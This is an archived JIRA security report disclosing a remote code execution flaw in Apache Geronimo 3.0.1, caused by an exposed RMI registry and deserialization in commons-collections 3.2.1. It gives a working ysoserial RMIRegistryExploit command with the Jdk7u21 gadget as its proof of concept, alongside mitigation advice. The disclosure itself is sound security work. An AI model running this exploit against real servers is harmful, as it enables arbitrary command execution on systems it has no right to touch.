geronimo-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "sevck (JIRA)" <j...@apache.org>
Subject [jira] [Created] (GERONIMO-6596) Apache Geronimo Remote Code Execute Vulnerability
Date Wed, 29 Nov 2017 02:22:00 GMT
sevck created GERONIMO-6596:
-------------------------------

             Summary: Apache Geronimo Remote Code Execute Vulnerability
                 Key: GERONIMO-6596
                 URL: https://issues.apache.org/jira/browse/GERONIMO-6596
             Project: Geronimo
          Issue Type: Bug
      Security Level: public (Regular issues)
          Components: dependencies, security
    Affects Versions: 3.0.1
         Environment: linux,windows
            Reporter: sevck
            Priority: Critical


The unsupported Geronimo old versions may be also affected

Description:
The Apache Geronimo default enabled JAVA RMI 1099 port and default bind ip 0.0.0.0, in bash,
I use "grep -R InvokerTransformer" command, find defalut use commons-collections-3.2.1.jar.

[root@localhost geronimo-tomcat7-javaee6-3.0.1]# grep -R InvokerTransformer .
Binary file ./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
matches

This looks like JAVA deserialization is taken for granted. But,I use ysoserial tools. CommonsCollections1
in response
java.lang.ClassNotFoundException: org.apache.commons.collections.map.TransformedMap (no security
manager: RMI class loader disabled),
Seems to be classpath error, In java version 7u21 chanlog:
-------------------------------------
Changes to RMI
>From this release, the RMI property java.rmi.server.useCodebaseOnly is set to true by
default. In previous releases the default value was false.

This change of default value may cause RMI-based applications to break unexpectedly. The typical
symptom is a stack trace that contains a java.rmi.UnmarshalException containing a nested java.lang.ClassNotFoundException.

For more information, see RMI Enhancements.
---------------------------------------
so,use 7u21 run application.
attack server: 
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25
1099  Jdk7u21 "touch /tmp/apache_geronimo"


Mitigation:
Commons-collections-3.2.1 users should upgrade to 3.2.2
Ports are not allowed for public access
Exploit:
(precondition: server run jre version is 7u21)
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25
1099  Jdk7u21 "touch /tmp/apache_geronimo"
Credit:
This issue was discovered by QingTeng cloud Security of Minded Security Researcher jianan.huang



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)

Mime
View raw message